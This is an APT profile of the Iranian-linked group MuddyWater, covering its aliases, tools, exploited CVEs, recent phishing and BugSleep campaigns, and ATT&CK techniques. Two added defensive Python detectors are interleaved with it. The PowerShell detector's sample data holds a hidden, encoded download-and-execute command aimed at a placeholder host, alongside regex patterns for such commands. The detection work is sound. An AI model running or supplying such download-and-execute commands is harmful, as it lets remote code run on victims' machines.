APT Profile: MuddyWater – Cyfirma

Summary:

MuddyWater is an advanced persistent threat (APT) group linked to the Iranian government, primarily targeting organizations in the Middle East. Utilizing in-memory attack techniques, they maintain a low detection profile while focusing on espionage and information theft. Their recent campaigns have involved phishing attacks and the deployment of custom malware, particularly against Israeli organizations.

Key points:

  • MuddyWater is affiliated with the Iranian government.
  • Targets include Saudi Arabia, UAE, Iraq, and other Middle Eastern countries.
  • Employs in-memory attack techniques, avoiding new binaries on victim machines.
  • Recent campaigns have intensified against Israeli organizations.
  • Utilizes phishing tactics to deploy legitimate remote management tools.
  • Developed a custom malware implant called BugSleep for remote command execution.

MITRE Techniques

  • Reconnaissance (T1589.002): Conducts reconnaissance to gather information about targets.
  • Persistence (T1574.002): Establishes persistence mechanisms to maintain access.
  • Discovery (T1053.005): Uses discovery techniques to identify system information.
  • Resource Development (T1583.006): Develops resources for future operations.
  • Initial Access (T1566.001): Gains initial access through phishing campaigns.
  • Lateral Movement (T1210): Moves laterally within the network to access other systems.
  • Execution (T1059.003): Executes commands on compromised systems.
  • Defense Evasion (T1562.001): Evades detection mechanisms to maintain access.
  • Credential Access (T1555): Attempts to access and steal credentials.
  • Exfiltration (T1041): Exfiltrates data from compromised systems.

Published On : 2024-11-12

APT Profile – MUDDYWATER

MuddyWater is an APT group assessed to be affiliated with the Iranian Government. It targets victims in the Middle East with in-memory vectors that leverage PowerShell, in a family of attacks now identified as “Living off the land”, so called because they do not require the creation of new binaries on the victim’s machine and thus maintain a low detection profile and a low forensic footprint. The operators behind MuddyWater are likely espionage motivated. Despite the strong preponderance of victims from Pakistan, the most active targets appear to be in Saudi Arabia, the UAE, and Iraq.
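A defender-side illustration of the living-off-the-land pattern described above. This is an added example, not code from the Cyfirma profile: it scans constructed Windows PowerShell telemetry (process-creation command lines, Event ID 4688, and script block text, Event ID 4104) for the hallmarks of in-memory PowerShell execution, decodes -EncodedCommand payloads so the hidden script can be inspected, and requires two corroborating indicators before flagging, so a benign administrative script run with -ExecutionPolicy Bypass is not alerted on. The sample records, host names and URLs are constructed; only the event IDs and PowerShell switches are real.

```python
import base64
import re
from typing import Dict, List, Optional

# Constructed sample telemetry (not from a real incident): process creation (4688) carries
# the command line, PowerShell script block logging (4104) carries the script text.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')".encode("utf-16-le")
).decode("ascii")

SAMPLE_EVENTS: List[Dict] = [
    {"id": 4688, "host": "ws-17", "text": "powershell.exe -NoP -W Hidden -Enc " + _ENCODED},
    {"id": 4104, "host": "ws-17",
     "text": "$c = New-Object Net.WebClient; IEX $c.DownloadString('http://example.invalid/b.ps1')"},
    {"id": 4104, "host": "ws-22", "text": "Get-ChildItem C:\\Users | Measure-Object"},
    {"id": 4688, "host": "ws-09", "text": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"},
]

# Each indicator is a weak signal on its own (admins use several of them legitimately),
# so an event is only flagged when at least two of them coincide.
INDICATORS = {
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "remote_download": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "policy_bypass": re.compile(r"-ex(?:ecutionpolicy)?\s+bypass", re.I),
    "base64_inline": re.compile(r"FromBase64String", re.I),
    "in_memory_load": re.compile(r"Reflection\.Assembly|\[System\.Reflection", re.I),
}

# -EncodedCommand and the abbreviations PowerShell accepts, followed by the base64 payload.
_ENC_RE = re.compile(r"-e(?:ncodedcommand|ncoded|nc|n|c)?\b\s+([A-Za-z0-9+/=]{8,})", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE plaintext of a -EncodedCommand payload, or None if absent or undecodable."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return None


def score_script(text: str) -> List[str]:
    """Names of the living-off-the-land indicators present in a command line or script block."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def analyze(events: List[Dict]) -> List[Dict]:
    """Score every event; the decoded payload of a 4688 command line is scored together with it."""
    findings = []
    for ev in events:
        decoded = decode_encoded_command(ev["text"]) if ev["id"] == 4688 else None
        text = ev["text"] + ("\n" + decoded if decoded else "")
        hits = score_script(text)
        findings.append({
            "host": ev["host"],
            "id": ev["id"],
            "indicators": hits,
            "decoded": decoded,
            "suspicious": len(hits) >= 2,  # require corroboration before alerting
        })
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"{f['host']} event {f['id']}: {flag} {f['indicators']}")
        if f["decoded"]:
            print("  decoded:", f["decoded"])
```

The two-indicator threshold is the deliberate design choice: the fourth sample (a scheduled backup script with only the policy bypass) stays quiet, while the encoded download-and-execute command line trips four indicators once its payload is decoded. In production the same logic would run over script block logs exported from the event log or an EDR, with the indicator table extended to whatever the environment's own PowerShell baseline shows to be unusual.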

Alias:
MERCURY, Seedworm, Static Kitten, TEMP.Zagros, Earth Vetala

Motivation:
Information theft and espionage

Target Technologies:
Office Suites Software, Operating System, Web Application

Targeted Industries:
Aerospace, Aerospace & Defense, Agriculture, Capital Goods, Consumer Services, Defense, Energy, Energy Equipment & Services, Finance, Food, Gaming, High Tech IT Service Providers, Individuals, Media, Media & Entertainment, Military, NGO, Natural Resources, Oil and Gas, Politics, Telecommunication, Telecommunication Services, Transportation, Construction, Cryptocurrency, Education, Engineering, Government, Healthcare, and Metals

Targeted Countries
Israel, Saudi Arabia, the United Arab Emirates, Iraq, Jordan, Lebanon, Qatar, Albania, Turkey, Austria, Ukraine, Russia, India, Azerbaijan, Pakistan, the United States of America, and Mali

Tools Used:
Secure Sockets Funneling, Remadmin, Chisel, Quarks pwDump, PowGoop (Downloader.Covic), Mimikatz, POWERSTATS, PowGoop, Thanos ransomware

Recently Exploited Vulnerabilities by MUDDYWATER

  • CVE-2017-0199
  • CVE-2020-1472
  • CVE-2017-11882
  • CVE-2017-0144
  • CVE-2017-17215
  • CVE-2014-8361

MUDDYWATER’s Recent Campaign Highlights and Trends

  • In a recent campaign, the MuddyWater threat group is believed to have targeted organizations in Saudi Arabia, Turkey, Azerbaijan, India, and Portugal. The attackers have been using compromised organizational email accounts to send phishing messages, primarily aimed at deploying legitimate remote management tools like Atera Agent and Screen Connect. These phishing campaigns, ongoing since February 2024, focus on various sectors, including government bodies, municipalities, media outlets, and travel agencies. So far, over 50 spear-phishing emails have been identified across more than ten sectors, each customized to lure specific targets into enabling remote access through legitimate software, which helps MuddyWater evade detection while maintaining persistent access.
  • Since October 2024, MuddyWater has intensified its cyber operations against Israeli organizations. This increased activity is part of a broader campaign deploying a custom malware implant known as BugSleep. This new backdoor enables MuddyWater to execute remote commands and transfer files on compromised systems, representing a shift from their prior use of legitimate remote management tools like Atera Agent and Screen Connect. Designed for remote command execution and file transfer between infected systems and a command-and-control server, BugSleep is still under development, with continuous updates aimed at enhancing its functionality and evasion capabilities.
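The first campaign highlight above turns on a detection problem: Atera Agent and ScreenConnect are legitimate tools, so their mere presence is not an indicator, but the way they arrive is. The following added example (not code from the Cyfirma profile) classifies constructed process-creation records in the shape of Sysmon Event ID 1 fields, naming the remote management tool involved and raising an alert only when its installation context is wrong: spawned by a mail client, Office application or browser, run from a user-writable path, or not on the organisation's allowlist of approved tool/host pairs. The executable and installer names in the keyword table, the allowlist, hosts, users and paths are all assumed for the example.

```python
from typing import Dict, List, Optional, Set, Tuple

# Constructed process-creation records (Sysmon Event ID 1 style fields); nothing here
# comes from a real incident.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "ws-31", "user": "CORP\\j.doe",
     "image": r"C:\Users\j.doe\AppData\Local\Temp\ScreenConnect.ClientSetup.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "cmdline": r"ScreenConnect.ClientSetup.exe"},
    {"host": "ws-12", "user": "CORP\\a.smith",
     "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'msiexec.exe /i "C:\Users\a.smith\Downloads\AteraAgent.msi" /qn'},
    {"host": "srv-it-01", "user": "NT AUTHORITY\\SYSTEM",
     "image": r"C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe",
     "parent": r"C:\Windows\System32\services.exe",
     "cmdline": r'"C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe"'},
    {"host": "ws-05", "user": "CORP\\m.lee",
     "image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"notepad.exe notes.txt"},
]

# Keyword (matched against image path and command line) -> tool name.
# The binary/installer names are assumptions for this example; tune them to your telemetry.
RMM_KEYWORDS: Dict[str, str] = {
    "ateraagent": "Atera Agent",
    "screenconnect": "ConnectWise ScreenConnect",
}

# Parents that should not normally spawn an RMM installer: mail clients, Office, browsers, PDF readers.
SUSPICIOUS_PARENTS: Set[str] = {
    "outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe",
    "chrome.exe", "msedge.exe", "firefox.exe", "acrord32.exe",
}

# Constructed allowlist of (tool, host) pairs where IT deploys the tool deliberately.
APPROVED_RMM: Set[Tuple[str, str]] = {("Atera Agent", "srv-it-01")}


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def _user_writable(path: str) -> bool:
    """True when the path (or a path inside a command line) sits in a user-writable location."""
    p = path.replace("\\", "/").lower()
    return any(marker in p for marker in ("/users/", "/temp/", "/appdata/"))


def detect_rmm(event: Dict[str, str]) -> Optional[str]:
    """Name the RMM tool referenced by the image or command line, or None."""
    haystack = (event["image"] + " " + event["cmdline"]).lower()
    for keyword, tool in RMM_KEYWORDS.items():
        if keyword in haystack:
            return tool
    return None


def assess(event: Dict[str, str]) -> Optional[Dict]:
    """Classify an RMM-related event as 'alert' or 'info'; events without an RMM tool return None."""
    tool = detect_rmm(event)
    if tool is None:
        return None
    reasons: List[str] = []
    if _basename(event["parent"]) in SUSPICIOUS_PARENTS:
        reasons.append("parent is a mail, office or browser process")
    if _user_writable(event["image"]) or _user_writable(event["cmdline"]):
        reasons.append("installer or binary in user-writable path")
    if (tool, event["host"]) not in APPROVED_RMM:
        reasons.append("tool/host pair not on the approved RMM allowlist")
    return {"host": event["host"], "tool": tool, "reasons": reasons,
            "severity": "alert" if reasons else "info"}


def run(events: List[Dict[str, str]]) -> List[Dict]:
    """Assess every event and keep only those that involve an RMM tool."""
    return [a for a in (assess(e) for e in events) if a is not None]


if __name__ == "__main__":
    for result in run(SAMPLE_EVENTS):
        print(f"{result['severity'].upper():5} {result['host']:10} {result['tool']}: {'; '.join(result['reasons']) or 'approved deployment'}")
```

The allowlist is what keeps this usable: the approved agent running as a service on the IT server is recorded as informational, while the ScreenConnect installer dropped into a user's Temp folder by Outlook collects all three reasons. An msiexec launch is caught through its command line rather than its image name, which is why both fields are searched.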

Malware used by MUDDYWATER:
POWERSTATS

MITRE ATT&CK Techniques used by MUDDYWATER

  • Reconnaissance: T1589.002
  • Resource Development: T1583.006, T1588.002
  • Initial Access: T1566.001, T1566.002, T1190
  • Execution: T1203, T1047, T1059.003, T1053.005, T1204.001, T1059.001, T1204.002, T1059.006, T1059.007, T1559.002, T1559.001, T1059.005
  • Persistence: T1053.005, T1137.001, T1574.002, T1547.001
  • Privilege Escalation: T1548.002, T1053.005, T1574.002, T1547.001
  • Defense Evasion: T1548.002, T1218.011, T1027, T1562.001, T1036.005, T1027.003, T1027.004, T1140, T1218.003, T1574.002, T1218.005
  • Credential Access: T1555, T1555.003, T1552.001, T1003.005, T1003.004, T1003.001
  • Discovery: T1087.002, T1518.001, T1049, T1016, T1057, T1033, T1518, T1082, T1083
  • Lateral Movement: T1210
  • Collection: T1113, T1074.001, T1560.001
  • Command and Control: T1573.001, T1104, T1071.001, T1102.002, T1132.001, T1219, T1090.002, T1105
  • Exfiltration: T1041

Source: Original Post